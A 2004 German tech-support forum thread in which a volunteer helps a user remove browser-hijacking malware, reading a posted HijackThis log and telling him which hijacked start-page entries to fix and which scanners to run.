normal neustarten


scanne mit mwav.exe...30 Tage free
http://www.mwti.net/antivirus/free_utilities.asp

Scanne mit AdAware free
http://www.lavasoft.de/
Lade SpyHunter
http://www.spy-bot.net/manual.asp


loesche die TemporaryInternetFiles und dann poste, ob wieder alles funktioniert.
MfG
Sabina
__________
MfG Sabina

rund um die PC-Sicherheit
Dieser Beitrag wurde am 21.06.2004 um 16:45 Uhr von Sabina editiert.
Seitenanfang Seitenende
21.06.2004, 18:26
chrisi
zu Gast

Themenstarter
#14 konkret gut sabina!
habe heute im büro nochmal gefragt die hatten mir auch geholfen, und auch nochmal danke an werner (gut das es hier sowas gibt jeder hilft jedem).
ab heute hab ich ne firewall mal drauf gemacht. echt ätzend was man sich so einfangen kann.
gruß
chrisi

an sabina
an sabina, nun mein log nachdem ich im registry die exe gelöscht habe!?
muss ich nun noch etwas machen? weil du doch meintest ich solle was fixen?


Logfile of HijackThis v1.97.7
Scan saved at 18:52:27, on 21.06.2004
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccEvtMgr.exe
C:\Programme\Norton AntiVirus\navapsvc.exe
C:\WINDOWS\htpatch.exe
C:\WINDOWS\SOUNDMAN.EXE
C:\HP\KBD\KBD.EXE
C:\Programme\ATI Technologies\ATI Control Panel\atiptaxx.exe
C:\Programme\VERITAS Software\Update Manager\sgtray.exe
C:\Programme\Winamp3\winampa.exe
C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe
C:\Programme\PicoZip\PicoZipTray.exe
C:\Programme\SAGEM\SAGEM F@st 800-840\dslmon.exe
C:\Programme\FinePixViewer\QuickDCF.exe
C:\Programme\Messenger\msmsgs.exe
C:\Programme\Internet Explorer\iexplore.exe
C:\Dokumente und Einstellungen\Eigene Dateien\Software\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://google.de/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://195.225.176.14/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://195.225.176.14/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://195.225.176.14/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://de7.hpwis.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,Shellnext = http://de7.hpwis.com/
O2 - BHO: (no name) - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 5.0\Reader\ActiveX\AcroIEHelper.ocx
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: NAV Helper - {BDF3E430-B101-42AD-A544-FADC6B084872} - C:\Programme\Norton AntiVirus\NavShExt.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: Norton AntiVirus - {42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} - C:\Programme\Norton AntiVirus\NavShExt.dll
O4 - HKLM\..\Run: [HTpatch] C:\WINDOWS\htpatch.exe
O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE
O4 - HKLM\..\Run: [KBD] C:\HP\KBD\KBD.EXE
O4 - HKLM\..\Run: [ATIPTA] C:\Programme\ATI Technologies\ATI Control Panel\atiptaxx.exe
O4 - HKLM\..\Run: [StorageGuard] "C:\Programme\VERITAS Software\Update Manager\sgtray.exe" /r
O4 - HKLM\..\Run: [WinampAgent] "C:\Programme\Winamp3\winampa.exe"
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\System32\\NeroCheck.exe
O4 - HKLM\..\Run: [ccApp] "C:\Programme\Gemeinsame Dateien\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [ccRegVfy] "C:\Programme\Gemeinsame Dateien\Symantec Shared\ccRegVfy.exe"
O4 - HKLM\..\Run: [REGSHAVE] C:\Programme\REGSHAVE\REGSHAVE.EXE /AUTORUN
O4 - HKCU\..\Run: [MSMSGS] "C:\Programme\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [PicoZip] C:\Programme\PicoZip\PicoZipTray.exe
O4 - Global Startup: DSLMON.lnk = C:\Programme\SAGEM\SAGEM F@st 800-840\dslmon.exe
O4 - Global Startup: Exif Launcher.lnk = ?
O14 - IERESET.INF: START_PAGE_URL=http://de7.hpwis.com
O16 - DPF: ppctlcab - http://www.pestscan.com/scanner/ppctlcab.cab
O16 - DPF: {19E28AFC-EAE3-4CE5-AC83-2407B42F57C9} (MSSecurityAdvisor Class) - http://download.microsoft.com/download/0/5/c/05c905f4-dd30-427d-a3de-373c3e5552fc/msSecAdv.cab?1087508194406
O16 - DPF: {2FC9A21E-2069-4E47-8235-36318989DB13} (PPSDKActiveXScanner.MainScreen) - http://www.pestscan.com/scanner/axscanner.cab
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (HouseCall-Kontrolle) - http://a840.g.akamai.net/7/840/537/2004061001/housecall.trendmicro.com/housecall/xscan53.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{6A6A3C85-8FEA-438C-8BDF-72354B2AAE0F}: NameServer = 62.27.27.62 62.27.53.66
Dieser Beitrag wurde am 21.06.2004 um 18:54 Uhr von chrisi editiert.
Seitenanfang Seitenende
21.06.2004, 19:46
Ehrenmitglied
Avatar Sabina

Beiträge: 29434
#15 Crisi
fixe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://195.225.176.14/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://195.225.176.14/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://195.225.176.14/
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = http://195.225.176.14/



neustarten

scanne mit mwav.exe...30 Tage free
http://www.mwti.net/antivirus/free_utilities.asp

Scanne mit AdAware free
http://www.lavasoft.de/
Lade SpyHunter
http://www.spy-bot.net/manual.asp


loesche die TemporaryInternetFiles !!!!!!!!!
Du hast noch irgendeinen dll drauf, die die Startseite verstellt...aber ich kann sie nicht sehen.

Lade noch den CWHredder
http://www.trojaner-info.de/anleitungen/hijackthis/about_blank.html

Dann lade das Log noch mal,

MfG
Sabina
__________
MfG Sabina

rund um die PC-Sicherheit
Dieser Beitrag wurde am 22.06.2004 um 07:45 Uhr von Sabina editiert.
Seitenanfang Seitenende
Um auf dieses Thema zu ANTWORTEN
bitte erst » hier kostenlos registrieren!!

Folgende Themen könnten Dich auch interessieren: